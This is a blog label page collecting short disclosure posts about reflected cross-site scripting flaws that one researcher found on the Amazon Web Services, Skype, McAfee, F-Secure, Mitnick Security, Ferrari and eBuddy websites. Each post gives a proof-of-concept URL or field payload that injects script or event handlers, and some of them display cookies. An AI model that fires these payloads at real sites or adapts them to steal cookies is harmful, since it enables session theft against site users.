Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Fabián Cuchietti. Show all posts

XSS Vulnerability in Amazon website ,found by Fabian Cuchietti

Security Researcher, Fabian Cuchietti discovered XSS vulnerability in the Amazon Web Services(aws.amazon.com).

POC:
https://aws.amazon.com/amis?ami_provider_id=4&architecture='%22--%3E%3C/style%3E%3C/script%3E%3Cscri
pt%3Ealert(0x015E00)%3C/script%3E&selection=ami_provider_id%2Barchitecture

It seems that the vulnerability has been fixed by vendor, the admin managed to filter html codes by converting to html special characters. Anyway we are able to retrieve the mirror of the vulnerability from XSSed.com. 

Mirror is available here:
http://www.xssed.com/mirror/77551/

Screenshot of the vulnerability

XSS vulnerability found in Skype, FSecure and McaFee websites

After an interesting XSS find in Kevin Mitnick's site, Security Researcher Fabián Cuchietti come with more interesting find.  This time the he discovered xss vulnerability in Skype, Mcafee and Fsecure websites.





The Phorm page of skype is vulnerable to Cross site scripting.
Poc:
http://about.skype.com/press/enquiry/phorm/phorm.php?PHORM_CONFIG=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E

McAfee:



https://kc.mcafee.com/corporate/index?page=content&channel=%27%22%20onmouseover=prompt%28090943%29%20bad=%22%20//

F-Secure: 


https://kb.f-secure.com/display/2/loginSecureFrame.aspx?cpid=%22%20onmouseover=prompt%2883893%29%20bad=%22%20//&c=3&cpc=3&cid=3&t=3&aid=3&cat=3&catURL=3&r=0.490020453929901

The XSS Vulnerability discovered on these sites could allow an attacker to steal cookies if he manages to convince the users to click on a specially crafted link.

XSS vulnerability found in Kevin Mitnick's website by Fabián Cuchietti


Kevin Mitnick , the legend of Social Engineering, was the most-wanted computer criminal in the United States, now working as Security Consultant.  The website belong to Mitnick is found to be vulnerable to Cross site scripting(XSS) Vulnerability.

Vulnerability Details:
  • Target:  MitnickSecurity
  • Vulnerable Link : http://mitnicksecurity.com/workshop_signup.php
  • Vulnerable Field : strEmail 
  • POC: /"><iframe onload=alert(document.cookie)>
The above mentioned vulnerability is found by Security Researcher Fabián Cuchietti. Recently Cuchietti discovered XSS Vulnerability in Ferrari website also.

XSS vulnerability in Ferrari Website, found by @FabianCuchietti


Security Researcher FabianCuchietti has discovered a Cross site scripting vulnerability in Ferrari website.Ferrari S.p.A. is an Italian sports car manufacturer based in Maranello, Italy. Founded by Enzo Ferrari in 1929, as Scuderia Ferrari.


POC:
http://www.ferrari.com/English/Formula1/Search/Pages/AllCategories.aspx
?k="><script>alert('Ferrari XSS - @FabianCuchietti')</script>

eBuddy Official Website vulnerable to Cross-site scripting

A security Analyst known as Fabián Cuchietti discovered a cross site scripting(XSS) vulnerability in official website of Ebuddy  .

eBuddy Web Messenger is a web based instant messaging service allows users to Chat online with friends on MSN, Yahoo, AIM, ICQ, GTalk, Facebook and MySpace IM.

The email unsubscribe page of the ebuddy website is found to be vulnerable to XSS attack, the mail address field is vulnerable to XSS.


Poc:
http://www.ebuddy.com/unsubscribe.php?email=%22%20onmouseover%3Dprompt%28961107%29%20bad%3D%22&submit=Unsubscribe